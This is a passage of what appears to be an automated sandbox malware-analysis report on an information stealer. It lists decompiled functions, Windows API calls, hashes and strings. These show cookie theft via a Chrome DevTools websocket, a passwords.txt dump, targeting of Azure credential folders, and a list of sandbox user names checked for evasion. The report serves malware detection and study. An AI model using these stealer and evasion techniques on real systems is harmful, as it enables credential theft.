                                                                                                                                                                                                                                                          • Opcode ID: 498754e0584a41d8368ccb035dc460eafadafb8fd4975662656f6cd2aa3164f2
                                                                                                                                                                                                                                                          • Instruction ID: 7a637e0ec74a1e8c76659d5a995aee7843bc27b34cd615a4d08e2fe79418bf46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 498754e0584a41d8368ccb035dc460eafadafb8fd4975662656f6cd2aa3164f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC71913250015AAFCB217FB5FD4DCAF7B79EF59301B018014FB01A216ADBBA5901DBA1
                                                                                                                                                                                                                                                          Function 6CD50610 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 321libraryloaderstringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CD50650
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CD50664
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CD50696
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6CD506C5
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6CD506F5
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD50714
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6CD50798
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD507AD
                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000002), ref: 6CD507C2
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6CD507F0
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6CD5086C
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6CD5088B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6CD50939
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD5094E
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6CD509AD
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD509BE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$CurrentProcess$CloseCreateHandleLibraryLoadMutexObjectSingleWaitlstrlen
                                                                                                                                                                                                                                                          • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                                                                                                                                                                                                                          • API String ID: 1912552845-356128008
                                                                                                                                                                                                                                                          • Opcode ID: ca52cd8e5aeae1186085072b9ffcb16e0b9f5cd1c34c5fb6361b4d379bff246c
                                                                                                                                                                                                                                                          • Instruction ID: cd2090854a92e4ae53a2b5a2bd5db9f1669bdca3f0e45e35b991e1c5eb57a374
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca52cd8e5aeae1186085072b9ffcb16e0b9f5cd1c34c5fb6361b4d379bff246c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4C1D5B1E01298DBFF11CFB5C844BAE7BB8AB45798F144219E514BB790D7709804CFA0
                                                                                                                                                                                                                                                          Function 010045B7 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 010045BF
                                                                                                                                                                                                                                                          • __mtterm.LIBCMT ref: 010045CB
                                                                                                                                                                                                                                                            • Part of subcall function 0100428A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0100429B
                                                                                                                                                                                                                                                            • Part of subcall function 0100428A: TlsFree.KERNEL32(FFFFFFFF), ref: 010042B5
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 010045E1
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 010045EE
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 010045FB
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01004608
                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32 ref: 01004658
                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 01004673
                                                                                                                                                                                                                                                          • __init_pointers.LIBCMT ref: 0100467D
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 0100468E
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 0100469B
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 010046A8
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 010046B5
                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(Function_0002440E), ref: 010046D6
                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 010046EB
                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 01004705
                                                                                                                                                                                                                                                          • __initptd.LIBCMT ref: 01004710
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01004717
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 3732613303-3819984048
                                                                                                                                                                                                                                                          • Opcode ID: 58ec33fdfe7f33255ce4c58e93a501a751999ca52e8e22519b3d099cf9acb4ce
                                                                                                                                                                                                                                                          • Instruction ID: f952325d3fa6103092665a52f113f6ca67c5f8d0be120b1a7203887f1db8fa1e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ec33fdfe7f33255ce4c58e93a501a751999ca52e8e22519b3d099cf9acb4ce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12317F709013519FEB72AF79A9089063FE4BB4D261F01462BE6C4D7298EB7E8001DF49
                                                                                                                                                                                                                                                          Function 00FE8B56 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 229stringmemoryfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FE8BFB
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00FE8C50
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FE8C57
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE8CF1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D0A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D14
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161B4), ref: 00FE8D20
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D2A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161B8), ref: 00FE8D36
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D43
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D4D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161BC), ref: 00FE8D59
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D66
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D70
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C0), ref: 00FE8D7C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D89
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D93
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C4), ref: 00FE8D9F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C8), ref: 00FE8DAB
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE8DE4
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FE8E31
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                          • String ID: passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 1139693110-347816968
                                                                                                                                                                                                                                                          • Opcode ID: 68f50256d6731b91776bc66ab5a315dd31cf9fc75ee92d08ca46ba24eb4f767a
                                                                                                                                                                                                                                                          • Instruction ID: e92b2b748d46392029810e59e3dcbde4b792e926c046a3c354fcd05b99a1c2c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68f50256d6731b91776bc66ab5a315dd31cf9fc75ee92d08ca46ba24eb4f767a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD814832900108AFCF51BBA1FE0A9DE7B75BF18301F504021FB01B6166DB7A6E15EB95
                                                                                                                                                                                                                                                          Function 00FE1917 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 00FE1A03
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(01019C70,?), ref: 00FE1A1E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: NameUserlstrcmpi
                                                                                                                                                                                                                                                          • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                                                                                          • API String ID: 542268695-1784693376
                                                                                                                                                                                                                                                          • Opcode ID: 25540a6aa918b7f09bb8053e040dc8b692e900aab7aff8d6b8c20b25fba22f37
                                                                                                                                                                                                                                                          • Instruction ID: 558a180c62e6b107e961c113c9346e59405f939dc38921f59f3b101f8bb89615
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25540a6aa918b7f09bb8053e040dc8b692e900aab7aff8d6b8c20b25fba22f37
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1421B3B190126C8BCB28DF55DC696DEBBF4AB4670CF4041D895C9AA208CB384A89DF81
                                                                                                                                                                                                                                                          Function 00FE8050 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 157stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FE7ECC: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00FE7EF4
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF3BD: memchr.MSVCRT ref: 00FEF426
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE80F5
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,ws://localhost:9223,?,10000000,?), ref: 00FE810F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE812A
                                                                                                                                                                                                                                                          • connect_to_websocket.CHROME(?,?), ref: 00FE8140
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE815D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Cookies), ref: 00FE8171
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010160C8), ref: 00FE8183
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8196
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010160CC), ref: 00FE81A8
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE81BB
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.txt), ref: 00FE81CD
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE81D9
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE81F7
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE823F
                                                                                                                                                                                                                                                          • free_result.CHROME(?), ref: 00FE824D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$_memset$lstrlen$InternetOpenXinvalid_argumentconnect_to_websocketfree_resultmemchrstd::_
                                                                                                                                                                                                                                                          • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                          • API String ID: 2702209820-4155744131
                                                                                                                                                                                                                                                          • Opcode ID: bb33eaf581800945ee7772bdfb6808caf60ffd76321f167929c6b7079c33649f
                                                                                                                                                                                                                                                          • Instruction ID: c3f3592a99ed5d6214edfaa108fda15cb65aa06b2e17b8a14964f69fda60daed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb33eaf581800945ee7772bdfb6808caf60ffd76321f167929c6b7079c33649f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A513C72D4066C9FCB21EBA5DC45ADBBB78BB08302F4044E5B208E7141EB759A888F50
                                                                                                                                                                                                                                                          Function 00FF669A Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF66BF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00FF66DE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 00FF66FB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF61F5
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindFirstFileA.KERNEL32(?,?), ref: 00FF620C
